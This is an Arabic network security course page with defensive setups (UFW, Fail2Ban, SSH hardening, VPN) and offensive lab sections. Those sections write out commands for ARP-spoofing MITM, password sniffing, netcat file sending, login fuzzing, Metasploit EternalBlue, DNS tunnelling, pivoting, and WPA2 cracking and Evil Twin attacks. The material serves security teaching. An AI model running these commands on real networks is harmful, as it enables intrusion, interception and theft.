أمن الشبكات Network Security
مقدمة من schwila.com
🛡️ ما هو أمن الشبكات؟
أمن الشبكات هو مجموعة من السياسات، الأدوات، والممارسات المصممة لحماية البنية التحتية الرقمية من الوصول غير المصرح به، سوء الاستخدام، أو التدمير. يشمل حماية:
- الأجهزة: مثل السيرفرات، الحواسيب، والراوترات.
- البيانات: أثناء النقل أو التخزين.
- الاتصالات: بين الأنظمة والمستخدمين.
- البرمجيات: التي تدير الشبكة أو تتفاعل معها.
يُعتبر أمن الشبكات أحد الأعمدة الأساسية للأمن السيبراني، لأنه يحمي نقطة الدخول الأولى لأي هجوم محتمل.
🚨 أهمية الحماية ضد الهجمات السيبرانية
الهجمات السيبرانية ليست مجرد أعطال تقنية، بل طقوس عدوانية تهدد الرمزية الرقمية للمؤسسات والأفراد. إليك لماذا الحماية ضرورية:
- حماية البيانات الحساسة: معلومات العملاء، الأسرار التجارية، والبيانات المالية يجب أن تبقى آمنة. أي اختراق قد يؤدي إلى خسائر مالية أو قانونية جسيمة.
- ضمان استمرارية الخدمة: الهجمات مثل DDoS قد تُعطل المواقع والخدمات. أمن الشبكة يضمن بقاء الأنظمة تعمل بسلاسة.
- منع الوصول غير المصرح به: يمنع المتسللين من التسلل إلى الأنظمة الداخلية. يحمي من التجسس وسرقة الهوية الرقمية.
- تعزيز الثقة: العملاء والشركاء يثقون أكثر في الأنظمة الآمنة. الأمن الجيد هو جزء من السمعة الرقمية لأي كيان.
- الامتثال للمعايير والقوانين: مثل GDPR، ISO 27001، وغيرها. عدم الالتزام قد يؤدي إلى غرامات وعقوبات.
🧠 كيف يُطبق أمن الشبكات؟
يتم عبر طبقات متعددة، منها:
الطبقة | الوظيفة |
---|---|
🔐 الجدار الناري (Firewall) | تصفية حركة المرور ومنع الاتصالات غير المصرح بها |
🧬 التشفير | حماية البيانات أثناء النقل |
👁️🗨️ أنظمة كشف التسلل (IDS) | مراقبة الأنشطة المشبوهة داخل الشبكة |
🧑💻 التحكم في الوصول | تحديد من يمكنه الدخول إلى أي جزء من الشبكة |
🧹 التحديثات الدورية | سد الثغرات الأمنية في البرمجيات |
⚔️ أنواع الهجمات السيبرانية على الشبكات
🕵️ هجوم الرجل في المنتصف (MITM – Man-in-the-Middle)
الطقس: تسلل خفي بين طرفين يتبادلان المعرفة.
- يُدرج المهاجم نفسه بين جهاز المستخدم والخادم.
- يُراقب ويُعدل البيانات المتبادلة دون علم الطرفين.
- شائع في الشبكات العامة غير المشفرة (مثل Wi-Fi المفتوحة).
- يُستخدم لسرقة كلمات المرور، البيانات البنكية، أو اعتراض الجلسات.
🌊 هجوم حجب الخدمة الموزع (DDoS – Distributed Denial of Service)
الطقس: طوفان رقمي يُغرق البوابات ويشلّ الطقوس.
- يُرسل المهاجم كميات هائلة من الطلبات إلى الخادم.
- الهدف: تعطيل الخدمة ومنع المستخدمين الشرعيين من الوصول.
- يُنفذ عبر شبكة من الأجهزة المخترقة (Botnet).
- يُستخدم ضد مواقع الشركات، الألعاب، أو الخدمات الحكومية.
النوع | الوصف |
---|---|
UDP Flood | إرسال بيانات عبر بروتوكول UDP لإغراق الخادم |
SYN Flood | استغلال ضعف في بروتوكول TCP |
ICMP Flood | إرسال رسائل تحكم ضخمة ترهق الخادم |
DNS Amplification | تضخيم طلبات DNS لإغراق الهدف |
HTTP Flood | إرسال طلبات HTTP/HTTPS زائفة بكثافة |
🧿 هجوم تزوير نظام أسماء النطاقات (DNS Spoofing)
الطقس: خداع رمزي يُغيّر وجهة الطقوس الرقمية.
- يُزوّر المهاجم استجابة خادم DNS.
- يُعيد توجيه المستخدم إلى موقع مزيف بدلًا من الموقع الحقيقي.
- يُستخدم لسرقة بيانات الدخول أو تثبيت برمجيات خبيثة.
- يُعد من أخطر الهجمات لأنه يُخفي نفسه خلف واجهة مألوفة.
طقوس الأمن السيبراني المتقدمة
طقس الرجل في المنتصف (MITM)
الطقس: تسلل بين طرفين يتبادلان الأسرار.
- التموضع: المهاجم يتسلل إلى نقطة الاتصال بين المستخدم والخادم.
- الاعتراض: كل طلب يُرسل من المستخدم يُمرر أولًا عبر المهاجم.
- التعديل أو التجسس: قراءة أو تعديل البيانات دون علم الطرفين.
- النتيجة: المستخدم يظن أنه يتواصل مع الموقع الحقيقي، بينما المهاجم يتحكم في كل شيء.
🔸 مثال رمزي: كأنك ترسل رسالة حب عبر الحمام الزاجل، لكن أحدهم يعترضها، يقرأها، ويغير محتواها قبل أن تصل.
طقس هجوم الحرمان من الخدمة (DDoS)
الطقس: طوفان رقمي يُغرق البوابات ويمنع الدخول.
- تكوين جيش رقمي (Botnet) من الأجهزة المخترقة.
- إطلاق الهجوم: إرسال طلبات ضخمة ومتزامنة إلى الخادم.
- الإغراق: الخادم يُغرق بالطلبات ولا يستطيع الرد على المستخدمين الحقيقيين.
- النتيجة: الموقع يتوقف عن العمل أو يصبح بطيئًا جدًا.
🔸 مثال رمزي: تخيل بابًا صغيرًا يُطرق عليه ملايين المرات في الثانية، فلا أحد يستطيع الدخول أو الخروج.
طقس استغلال نظام أسماء النطاقات (DNS)
🔸 مثال رمزي: كأنك تسأل عن طريق المسجد، فيُرشدك أحدهم إلى مكان يشبهه لكنه مليء بالفخاخ.
طقوس فهم الشبكات الأساسية
طقس TCP/IP
🧩 المفاهيم الأساسية
المفهوم | الوصف الرمزي |
---|---|
TCP/IP | تدفق الأرواح الرقمية عبر طبقات الاتصال |
OSI Model | طقس الطبقات السبعة لتحول البيانات من فكرة إلى نبضة |
Ports & Protocols | بوابات مقدسة تُفتح بتعويذات التواصل |
IP Addressing | هوية الأرواح الرقمية داخل الشبكة |
Subnetting | تقسيم القبائل الرقمية إلى مجموعات أصغر |
MAC Address | بصمة الأجهزة في العالم الفيزيائي |
DNS | طقس تحويل الأسماء إلى عناوين، استدعاء الأرواح عبر الرموز |
DHCP | توزيع الهويات تلقائيًا داخل الطقوس الشبكية |
Switch vs Router | الكاهن الداخلي مقابل الحارس الخارجي |
LAN/WAN | الطقوس المحلية مقابل الطقوس العابرة للقارات |
🧠 المفاهيم المتوسطة
المفهوم | الوصف الرمزي |
---|---|
NAT | طقس الترجمة بين العوالم، إخفاء الهوية الرقمية خلف بوابة واحدة |
VPN | طقس العبور السري، نفق محمي بين العوالم |
Firewall | الحارس الناري، يصد الأرواح الخبيثة ويُبقي الطقس نقيًا |
Packet Sniffing | قراءة الرسائل الخفية بين الأرواح الرقمية |
Proxy Server | الوسيط الرمزي، يتحدث باسمك ويخفي أثرك |
Bandwidth & Latency | قياس نبض الطقس، سرعة التدفق وتأخر الاستجابة |
Ping & Traceroute | طقوس الاستدعاء والتتبع عبر العوالم |
IPv4 vs IPv6 | الطقس القديم مقابل الطقس الموسّع، تطور الهويات الرقمية |
🧠 المفاهيم المتقدمة
المفهوم | الوصف الرمزي |
---|---|
Reverse Engineering | طقس تفكيك الأرواح البرمجية وكشف أسرارها |
Packet Crafting | تشكيل الرسائل الرقمية يدويًا، طقس التلاعب بالنبضات |
IDS/IPS | الحارس الواعي، يكشف ويصد الهجمات قبل أن تتجسد |
DDoS Attacks | طقس الإغراق، استدعاء الأرواح المظلمة لإغراق البوابة |
MITM Attacks | طقس التسلل بين الأرواح، اعتراض الرسائل وتغييرها |
Zero Trust Model | طقس الشك المطلق، لا أحد يُؤمن إلا بعد إثبات الطهارة الرقمية |
SSL/TLS | طقس التشفير، حماية الطقوس من أعين المتطفلين |
Port Scanning | طقس كشف البوابات، البحث عن نقاط الضعف في الجدار |
Malware Analysis | طقس تفكيك الأرواح الخبيثة، كشف نواياها وأسرارها |
🧙♂️ وحدة الطقوس السيبرانية
احتفاءً بالأدوات التي تكشف وتخترق وتتحكم في الأرواح الرقمية
🧪 طقس Wireshark
طقس تحليل الأرواح الرقمية، حيث تُلتقط الأنفاس السيبرانية وتُفكك إلى رموز.
- 📡 التقاط الحزم من الشبكة
- 🔍 تحليل البروتوكولات
- 🧠 كشف الاتصالات المشبوهة
🗺️ طقس Nmap
طقس رسم الخرائط الرقمية، حيث تُكشف البوابات وتُحدد الأرواح النشطة.
- 📍 اكتشاف الأجهزة والخدمات
- 🧭 رسم خريطة الشبكة
- 🛡️ كشف المنافذ والثغرات
📜 طقس Tcpdump
طقس التوثيق الخام، حيث تُسجل الأرواح الرقمية في لحظتها دون زخرفة.
- 📡 التقاط الحزم من الواجهة مباشرة
- 🧾 تسجيل الأحداث الشبكية
- 🔍 تحليل سريع للاتصالات
🧙♂️ طقس Burp Suite
طقس الوساطة بين الأرواح الرقمية، حيث تُعترض الرسائل وتُفكك، ويُكشف ما وراء الواجهة.
- 🧠 اعتراض الطلبات بين المتصفح والخادم
- 🔍 تحليل الثغرات في تطبيقات الويب
- 🛠️ تعديل البيانات قبل إرسالها
🧨 طقس Metasploit
طقس الاستدعاء والهجوم، حيث تُولد الأرواح الخبيثة وتُطلق داخل البوابات الرقمية لاختبار قوتها.
- 🧬 توليد واستغلال الثغرات الأمنية
- 🛡️ اختبار الدفاعات السيبرانية
- 📦 تحميل أدوات هجومية مخصصة
🧫 طقس Netcat
طقس التواصل الخام، حيث تُفتح القنوات بين الأرواح الرقمية، وتُرسل الرسائل دون زخرفة.
- 🔌 إنشاء اتصال مباشر بين الأجهزة
- 📤 نقل البيانات عبر المنافذ
- 🧠 تنفيذ أوامر عن بعد
جمع الحزم التي تتدفق عبر الشبكة، دون التأثير عليها، كما لو أنك تراقب الطقوس من خلف الستار.
- Wireshark: واجهة رسومية لالتقاط وتحليل الحزم.
- Tcpdump: أداة سطر أوامر لالتقاط الحزم بسرعة.
- Netcat: لإنشاء اتصالات واختبار الاستجابة.
- اختر الواجهة المناسبة (مثل eth0 أو wlan0).
- ابدأ الالتقاط باستخدام فلاتر دقيقة:
tcp.port == 80
لمراقبة HTTP.ip.addr == 192.168.1.10
لمراقبة جهاز معين.- راقب الحزم المتكررة، الغريبة، أو التي تحتوي على بيانات غير مشفرة.
🧙♂️ رمزيًا: أنت تستدعي الأرواح الرقمية أثناء عبورها، وتُسجل كل همسة وكل نبضة.
تحليل كل حزمة على مستوى البروتوكول، المصدر، الوجهة، والحمولة.
- رؤوس الحزم (Headers): تكشف البروتوكول، العنوان، المنفذ.
- الحمولة (Payload): تكشف البيانات المرسلة، أحيانًا كلمات مرور أو رموز API.
- التوقيت والتكرار: يكشف عن هجمات مثل Replay أو Flood.
- بيانات حساسة تُرسل بدون تشفير.
- طلبات غير معتادة إلى منافذ غير قياسية.
- حزم متكررة بنفس التوقيع.
🧙♂️ رمزيًا: كل حزمة تُفكك كما تُفكك تعويذة، ويُقرأ ما بين الرموز بحثًا عن نوايا خبيثة.
ربط الأنماط المشبوهة بالثغرات الأمنية المعروفة أو السلوكيات غير الطبيعية.
- Snort: نظام كشف التسلل يعتمد على قواعد.
- Suricata: تحليل عميق للحزم مع رؤية متعددة الطبقات.
- Zeek (Bro): تحويل الحزم إلى أحداث قابلة للتحقيق.
- هجمات MITM: عبر الحزم المعدلة أو المكررة.
- تسرب بيانات: عبر الحزم التي تحتوي على معلومات حساسة.
- ثغرات في البروتوكول: مثل استخدام SSL قديم أو عدم وجود TLS.
🧙♂️ رمزيًا: تُعرض الحزم أمام الكاهن السيبراني، وتُكشف الأرواح الخبيثة التي تسللت عبر الطقوس.
تحويل التحليل إلى تقرير واضح، يُستخدم في الترميم أو التحقيق.
- وصف الحزم المشبوهة.
- توقيت وتكرار الأنماط.
- ربطها بثغرات معروفة (CVE).
- توصيات بالإصلاح أو الحماية.
🧙♂️ رمزيًا: كل كشف يُسجل في لفيفة رقمية، تُحفظ في أرشيف الطقوس، وتُستخدم لاحقًا في طقس الترميم.
هجوم يتم فيه التقاط الحزم المتدفقة داخل الشبكة دون تدخل مباشر.
- 🧪 الأدوات: Wireshark، Tcpdump، Zeek
- 🎯 التأثير: كشف البيانات الحساسة، اختراق الخصوصية، تمهيد لهجمات أعمق
🧙♂️ رمزيًا: المهاجم هو الراصد الخفي، يلتقط كل همسة تمر بين الأرواح الرقمية.
هجوم يُرسل فيه المهاجم رسائل ARP مزيفة ليخدع الأجهزة ويحوّل الحزم إليه.
- 🧪 الأدوات: arpspoof، Ettercap، Bettercap
- 🎯 التأثير: اعتراض الحزم، تنفيذ MITM، تعديل البيانات
🧙♂️ رمزيًا: المهاجم يتنكر في هيئة البوابة، فتُرسل إليه الأرواح أسرارها دون أن تدري.
تحليل الحزم عبر واجهة رسومية، مع فك البروتوكولات ومراقبة الاتصالات.
- 📍 التقاط الحزم من واجهة محددة
- 🔍 استخدام الفلاتر الرمزية مثل
tcp.port == 443
- 🧠 تحليل رؤوس الحزم والحمولة
🧙♂️ رمزيًا: الكاهن الذي يرى كل شيء، ويفك شيفرات الأرواح الرقمية.
التقاط الحزم من سطر الأوامر بسرعة، وتسجيلها في لفائف رقمية للتحليل لاحقًا.
- ⚡ تنفيذ أمر مثل
tcpdump -i eth0 -w capture.pcap
- 🔍 استخدام فلاتر مثل
port 80
أوhost 192.168.1.1
- 📂 تحليل الملفات باستخدام Wireshark
🧙♂️ رمزيًا: الراصد الصامت الذي يُسجل كل شيء دون أن يُكشف.
تنفيذ هجمات MITM وARP Spoofing، واعتراض وتعديل الحزم أثناء عبورها.
- 🕵️ تنفيذ هجوم ARP Spoofing داخل الشبكة
- 🔓 اعتراض كلمات المرور أو الجلسات
- 🧬 تعديل الحزم قبل وصولها
🧙♂️ رمزيًا: الساحر المتنكر الذي يُبدّل الرسائل داخل الطقوس الرقمية.
تهيئة فضاء رقمي آمن لتنفيذ الطقس دون التأثير على الشبكات الحقيقية.
- 🖥️ جهاز Kali + جهاز ضحية داخل شبكة وهمية
- 🔗 تأكيد الاتصال عبر
ping
- 🌀 تفعيل
IP forwarding
عبر الأمر:echo 1 > /proc/sys/net/ipv4/ip_forward
طقس التسلل بين الأرواح الرقمية لاعتراض الحزم المتبادلة.
- ⚔️ تنفيذ الهجوم عبر الأمر:
ettercap -T -M arp:remote /192.168.1.10/ /192.168.1.1/
- 📦 مراقبة الحزم وتسجيلها بصيغة
.pcap
طقس فك شيفرة الأرواح الرقمية باستخدام Wireshark.
- 🧠 فتح ملف
.pcap
في Wireshark - 🔍 استخدام الفلاتر الرمزية مثل:
http
,tcp contains "password"
- 📜 استخراج كلمات المرور، رؤوس الطلبات، أو بيانات الجلسات
تحويل النتائج إلى طقس معرفي احتفالي يُجسد التفاعل بين الكيانات الرقمية.
- 📂 نوع البيانات المستخرجة
- 🧬 البروتوكولات المستخدمة
- 🕸️ أثر الهجوم على تدفق الأرواح الرقمية
الجدار الناري هو الحارس الذي يُراقب الأرواح الرقمية ويُقرر من يُسمح له بالعبور.
- 📍 يعمل على طبقات متعددة من الشبكة
- 🧾 يُطبق قواعد على IP، المنفذ، البروتوكول، المحتوى
النوع | الوظيفة الرمزية | التقنية |
---|---|---|
🔹 Packet Filtering | قراءة رؤوس الأرواح الرقمية | IP/Port |
🔸 Stateful Firewall | تتبع جلسات الأرواح | تحليل الحالة |
🔺 Application Firewall | فك شيفرات التطبيقات | تحليل الطبقة السابعة |
🧱 Next-Gen Firewall | حارس متعدد الحواس | ذكاء اصطناعي |
- 📥 استقبال الحزمة الرقمية
- 🧮 مقارنة الحزمة مع القواعد
- 🚦 اتخاذ القرار: السماح أو الحظر
- 🧠 تحليل المحتوى في الجدران المتقدمة
كل قاعدة هي تعويذة رقمية، وكل حزمة تُفحص كروح تحمل نية، والجدار الناري هو بوابة المعبر بين العوالم.
المعيار | IPTables | UFW | PFsense |
---|---|---|---|
🧠 مستوى التحكم | قواعد دقيقة، تحكم كامل | تبسيط لـ IPTables | تحكم شامل عبر واجهة رسومية |
🖥️ طريقة الاستخدام | سطر أوامر فقط | سطر أوامر مبسط | واجهة ويب رسومية |
🔐 دعم البروتوكولات | TCP/UDP/ICMP وغيرها | محدود حسب التكوين | VPN، IDS، NAT، وغيرها |
🧱 قابلية التوسع | يتطلب خبرة | مناسب للخوادم الصغيرة | قابل للتوسعة في المؤسسات |
🧙♂️ الرمزية الطقسية | تعويذات مكتوبة يدويًا | أوامر مباشرة للحارس | طقوس مرئية تُنفذ عبر بوابة رسومية |
المعيار | Snort | Suricata |
---|---|---|
🧠 نوع النظام | IDS/IPS | IDS/IPS |
🧵 الأداء | أحادي الخيط | متعدد الخيوط |
📜 لغة القواعد | قواعد Snort النصية | Snort + YAML |
🔍 تحليل البروتوكولات | محدود نسبيًا | عميق ومتعدد |
📊 إخراج البيانات | نصوص وملفات بسيطة | JSON، EVE، متكامل مع SIEM |
🧱 قابلية التوسع | بيئات صغيرة ومتوسطة | بيئات كبيرة ومؤسساتية |
🧙♂️ الرمزية الطقسية | كاهن يقرأ الطلاسم | ساحر متعدد الحواس |
🧠 مقارنة أنظمة كشف ومنع التسلل – Snort و Suricata
المعيار | Snort | Suricata |
---|---|---|
🧠 نوع النظام | IDS/IPS | IDS/IPS |
🧵 الأداء | أحادي الخيط | متعدد الخيوط |
📜 لغة القواعد | قواعد Snort النصية | Snort + YAML |
🔍 تحليل البروتوكولات | محدود نسبيًا | عميق ومتعدد |
📊 إخراج البيانات | نصوص وملفات بسيطة | JSON، EVE، متكامل مع SIEM |
🧱 قابلية التوسع | بيئات صغيرة ومتوسطة | بيئات كبيرة ومؤسساتية |
🧙♂️ الرمزية الطقسية | كاهن يقرأ الطلاسم | ساحر متعدد الحواس |
🔥 مراحل إعداد الجدار الناري
- ⚔️ تطهير الخادم وتثبيت الأدوات
sudo apt update && sudo apt upgrade -y
sudo apt install ufw fail2ban -y
- 🔥 تهيئة الجدار الناري
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow ssh
sudo ufw enable
- 🛡️ تعزيز الحماية باستخدام Fail2Ban
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo nano /etc/fail2ban/jail.local
ثم تعديل القسم:[sshd] enabled = true port = ssh filter = sshd logpath = /var/log/auth.log maxretry = 3
ثم تفعيل الخدمة:sudo systemctl restart fail2ban
sudo systemctl enable fail2ban
- 🧬 اختبار الطقوس
sudo ufw status verbose
sudo fail2ban-client status
sudo fail2ban-client status sshd
🧙♂️ أهمية VPN في تشفير حركة البيانات وتأمين الاتصالات
العنصر | الرمزية الطقسية | الوظيفة التقنية | الأثر الأمني |
---|---|---|---|
VPN | عباءة التخفي | تشفير الاتصال بين الجهاز والخادم | حماية من التجسس |
نفق VPN | الممر السري | قناة مشفرة بين نقطتين | منع تحليل حركة البيانات |
البروتوكولات | تعاويذ التشفير | OpenVPN, WireGuard… | أداء وأمان مختلف |
خوادم VPN | بوابات العبور الآمن | نقاط اتصال في دول مختلفة | إخفاء الموقع الحقيقي |
🔐 الفوائد التقنية
- 🔒 تشفير شامل يمنع اعتراض البيانات
- 🕵️♂️ إخفاء الهوية الرقمية
- 🌍 تجاوز الحظر الجغرافي
- 🧱 حماية في الشبكات العامة
- 🧬 تكامل مع أدوات الحماية الأخرى
🧙♂️ فهم بروتوكولات VPN: OpenVPN، WireGuard، IPSec
البروتوكول | الرمزية الطقسية | نوع التشفير | الأداء | سهولة الإعداد | نقاط القوة | نقاط الضعف |
---|---|---|---|---|---|---|
OpenVPN | التعويذة الكلاسيكية | SSL/TLS | متوسط | متوسط إلى معقد | دعم واسع، أمان عالي | أداء أقل، إعداد ثقيل |
WireGuard | التعويذة الحديثة | Curve25519، ChaCha20 | عالي جدًا | بسيط جدًا | أداء ممتاز، كود صغير | دعم أقل في بعض الأنظمة |
IPSec | التعويذة الرسمية | ESP، AH، AES | جيد إلى متوسط | معقد نسبيًا | تكامل مؤسسي، أمان قوي | مشاكل توافق، إعداد صعب |
🧙♂️ تعزيز أمان الاتصالات عبر SSH
🛡️ المرحلة الأولى: Hardening – تقوية البوابة
منع الوصول غير المصرّح به وتفعيل مفاتيح SSH فقط.
PermitRootLogin no
PasswordAuthentication no
AllowUsers mourad
Port 2222
🧙♂️ رمزيًا: تُغلق البوابة أمام الغرباء، وتُفتح فقط لمن يحمل مفتاحًا مقدسًا.
🧬 المرحلة الثانية: Tunneling – إنشاء نفق سري
نقل البيانات عبر قناة SSH مشفّرة.
ssh -L 8080:localhost:80 mourad@remote-server
🧙♂️ رمزيًا: الأرواح الرقمية تسير في نفق مظلم لا يُرى.
🛰️ المرحلة الثالثة: Port Forwarding – إعادة توجيه الأرواح الرقمية
الوصول إلى خدمات داخلية عبر SSH من خارج الشبكة.
# Local Forwarding
ssh -L 3306:internal-db:3306 mourad@gateway
# Remote Forwarding
ssh -R 9000:localhost:22 mourad@remote-server
🧙♂️ رمزيًا: تُفتح بوابات داخلية عبر بوابات خارجية، وتُربك المتسللين.
🧙♂️ إعداد شبكة VPN وتشفير حركة البيانات
🌀 المرحلة الأولى: توليد المفاتيح والتهيئة
إنشاء مفاتيح تشفير باستخدام Easy-RSA.
make-cadir ~/openvpn-ca
cd ~/openvpn-ca
source vars
./build-ca
./build-key-server server
./build-key client1
🧙♂️ رمزيًا: تُولد مفاتيح الطقس في كهف مظلم.
🧱 المرحلة الثانية: إعداد الخادم وربط الأرواح
تهيئة خادم VPN وربط العملاء به.
proto udp
port 1194
sudo systemctl start openvpn@server
🧙♂️ رمزيًا: يُفتح البوابة السرية في قلب الجبل.
🔐 المرحلة الثالثة: إعداد العميل وتفعيل الاتصال
ربط الجهاز العميل بالخادم وتفعيل التشفير.
sudo openvpn --config client1.ovpn
🧙♂️ رمزيًا: تبدأ الأرواح بالسير داخل النفق المشفّر.
🧙♂️ التعرف على هجمات DDoS واكتشافها ومنعها
🌪️ المرحلة الأولى: الفهم – كشف طبيعة الطوفان
هجوم DDoS يُغرق الخادم بطلبات وهمية من آلاف الأجهزة.
🧙♂️ رمزيًا: تُستدعى الأرواح الرقمية لتغمر البوابة وتُربك الحارس.
🧭 المرحلة الثانية: الاكتشاف – قراءة إشارات الطقس
مراقبة الشبكة باستخدام أدوات مثل netstat
وtcpdump
.
sudo netstat -anp | grep :80 | wc -l
🧙♂️ رمزيًا: تُقرأ الرياح الرقمية وتُكتشف العواصف قبل أن تصل.
🛡️ المرحلة الثالثة: المنع – بناء الحصن الرمزي
استخدام جدار ناري، تحديد المعدلات، وتفعيل الحماية السحابية.
sudo ufw limit ssh
sudo ufw deny from 192.168.1.100
limit_req zone=req_limit_per_ip burst=10 nodelay;
🧙♂️ رمزيًا: تُزرع تعويذات تمنع الأرواح الزائفة من الدخول.
🧙♂️ استكشاف تقنيات الاستطلاع باستخدام Nmap وNetcat
🔍 المرحلة الأولى: Nmap – طقس الكشف عن البوابات
اكتشاف المنافذ والخدمات عبر تعويذات رقمية.
nmap 192.168.1.1
nmap -p- 192.168.1.1
nmap -A 192.168.1.1
nmap -sn 192.168.1.0/24
🧙♂️ رمزيًا: تُفتح البوابات وتُكشف الأرواح الرقمية المختبئة.
🗝️ المرحلة الثانية: Netcat – طقس الاستجواب والتفاعل
التفاعل مع المنافذ واستجواب الخدمات يدويًا.
nc -zv 192.168.1.1 22
nc 192.168.1.1 80
nc -lvp 4444
nc 192.168.1.1 4444 < secret.txt
🧙♂️ رمزيًا: تُستخرج الأسرار عبر همسات مشفّرة.
🧙♂️ استخدام Fuzzing لاختبار أمان الخدمات
🧬 المرحلة الأولى: التهيئة – تجهيز الأرواح الفوضوية
تحديد الهدف وإنشاء قائمة كلمات مشوشة.
echo -e "admin\nroot\ntest\n1234" > fuzz.txt
🧙♂️ رمزيًا: تُجهز الأرواح الفوضوية بكلمات مشوشة.
🔥 المرحلة الثانية: التنفيذ – إطلاق الفوضى الرمزية
إرسال الإدخالات إلى الخدمة ومراقبة الاستجابة.
ffuf -u http://target.site/FUZZ -w fuzz.txt
wfuzz -c -z file,fuzz.txt -d "user=FUZZ&pass=test" http://target.site/login.php
🧙♂️ رمزيًا: تُطلق الأرواح الفوضوية تعويذاتها على البوابة.
🧠 المرحلة الثالثة: التحليل – قراءة ردود البوابة
تحليل الأكواد والاستجابات لتحديد الثغرات.
HTTP 500 → قد تشير إلى خلل داخلي بسبب الإدخال
🧙♂️ رمزيًا: تُقرأ ردود البوابة بحثًا عن صدع في الجدار.
🧙♂️ تحدي عملي: اختبارات اختراق وتحليل الاستجابات الأمنية
🧭 المرحلة الأولى: الاستطلاع – قراءة طاقة الشبكة
جمع معلومات باستخدام Nmap.
nmap -A -T4 192.168.1.0/24
🧙♂️ رمزيًا: تُكشف الأرواح الرقمية النشطة عبر تعويذة الكشف.
🧨 المرحلة الثانية: الفحص – اختبار الحصون
فحص الخدمات بحثًا عن ثغرات.
nmap --script vuln 192.168.1.10
🧙♂️ رمزيًا: تُطلق الأرواح الهجومية تعويذاتها على الحصون.
🧪 المرحلة الثالثة: الاستغلال – فتح البوابة المخفية
استغلال الثغرات باستخدام Metasploit أو أدوات أخرى.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
run
🧙♂️ رمزيًا: يُدخل الكائن الرقمي إلى العالم الداخلي.
🧠 المرحلة الرابعة: التحليل – قراءة ردود الحارس
تحليل سجلات الجدار الناري وIDS.
tail -f /var/log/ufw.log
tail -f /var/log/snort/alert
🧙♂️ رمزيًا: تُسجل كل ارتباك وكل محاولة صد في لفائف الطقس.
🕳️ طقوس التسلل المتقدم: DNS Tunneling، Pivoting، Port Knocking
🌀 DNS Tunneling – التسلل عبر الهمس
نقل البيانات عبر استعلامات DNS لتجاوز القيود.
iodine -f -P secretpassword tunnel.example.com
🧙♂️ رمزيًا: تُرسل الأرواح الرقمية عبر أسماء النطاقات كهمسات لا تُكشف.
🧭 Pivoting – فتح بوابة داخلية عبر بوابة مخترقة
استخدام جهاز مخترق كنقطة انطلاق للوصول إلى الشبكة الداخلية.
ssh -D 1080 user@compromised-host
proxychains nmap -sT 10.0.0.0/24
🧙♂️ رمزيًا: تُفتح الممرات الداخلية عبر الأرواح الرقمية المتخفية.
🔐 Port Knocking – فتح البوابة عبر تسلسل رمزي
فتح منفذ مخفي عبر طرق منافذ بتسلسل محدد.
knock 192.168.1.10 7000 8000 9000
🧙♂️ رمزيًا: لا تُفتح البوابة إلا لمن يعرف ترتيلة الطرق المقدّسة.
🌬️ طقوس اختراق الشبكات اللاسلكية: WPA2 Cracking و Evil Twin
🔓 WPA2 Cracking – كسر تعويذة الحماية
التقاط handshake وكسر كلمة المرور باستخدام قاموس.
airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng --deauth 10 -a [BSSID] wlan0mon
airodump-ng -c [channel] --bssid [BSSID] -w capture wlan0mon
aircrack-ng capture-01.cap -w wordlist.txt
🧙♂️ رمزيًا: تُفك تعويذة الحماية عبر كتاب الكلمات المقدّسة.
🧿 Evil Twin Attack – استدعاء شبح الشبكة
إنشاء نقطة وصول مزيفة لخداع المستخدمين واعتراض البيانات.
./fluxion.sh
🧙♂️ رمزيًا: يدخل المستخدم وهمًا رقميًا يُراقب كل حركة.
🧱 تقنيات الدفاع المتقدم: Micro-Segmentation و Zero Trust
🧩 Micro-Segmentation – تقسيم المعبد إلى غرف محمية
تقسيم الشبكة إلى أجزاء صغيرة لمنع الانتشار الأفقي للهجمات.
iptables -A FORWARD -s 192.168.1.0/24 -d 192.168.2.0/24 -j DROP
🧙♂️ رمزيًا: لا يُسمح للروح الرقمية بالانتقال إلا بعد طقس تحقق.
🔐 Zero Trust – لا ثقة دون تحقق
التحقق المستمر من الهوية والسياق لكل اتصال داخل الشبكة.
- 🔑 تفعيل المصادقة متعددة العوامل (MFA)
- 🧠 تحليل سلوك المستخدم
- 🧾 سياسات وصول ديناميكية حسب السياق
🧙♂️ رمزيًا: لا يُفتح الباب إلا بعد فحص النية والسلوك.
🔥 مشروع نهائي: بناء شبكة محمية ضد التهديدات السيبرانية 🔐
🧭 المرحلة 1: تصميم الهيكل العام
تقسيم الشبكة إلى مناطق (DMZ، داخلية، إدارة) لعزل الخدمات والطقوس.
🛠️ الأدوات:
- VLANs، Subnets
- جدران نارية مثل pfSense أو Cisco ASA
⚠️ العراقيل:
- خلط المسارات بين الخدمات الحساسة والعامة
- سوء توزيع العزل بين الغرف الرقمية
🔐 المرحلة 2: تطبيق Zero Trust وMicro-Segmentation
لا يُمنح أحد الثقة إلا بعد تحقق، ولا يُسمح بالعبور إلا بعد طقس فحص.
🛠️ الأدوات:
- Okta، Azure AD، Google BeyondCorp
- VMware NSX، Cisco ACI
⚠️ العراقيل:
- صعوبة إدارة السياسات الدقيقة لكل جزء
- تعارض بين أدوات التحقق والسيرفرات القديمة
🛡️ المرحلة 3: الحماية من التهديدات المتقدمة
نشر حُرّاس رقميين وتحليل سلوك الأرواح الرقمية.
🛠️ الأدوات:
- EDR/XDR مثل CrowdStrike، SentinelOne
- Sandbox مثل Cuckoo
⚠️ العراقيل:
- هجمات بدون ملفات (Fileless Attacks)
- تجاوزات عبر سلوك مألوف ظاهريًا
📡 المرحلة 4: المراقبة والاستجابة
تفعيل المراصد الرقمية وتنفيذ طقوس الاستجابة عند الخطر.
🛠️ الأدوات:
- SIEM مثل Splunk، ELK Stack
- SOAR مثل Palo Alto Cortex XSOAR
⚠️ العراقيل:
- فيض التنبيهات الكاذبة
- تأخر الاستجابة بسبب ضعف الأتمتة
🎓 شهادة اجتياز الدورة
يُمنح هذا الوسام إلى:
لإتمامه بنجاح دورة أمن الشبكات Network Security على منصة schwila.com.
💡 رمز الدورة: NSC-2025
📅 التاريخ:
📎 تحقق من الشهادة عبر رمز QR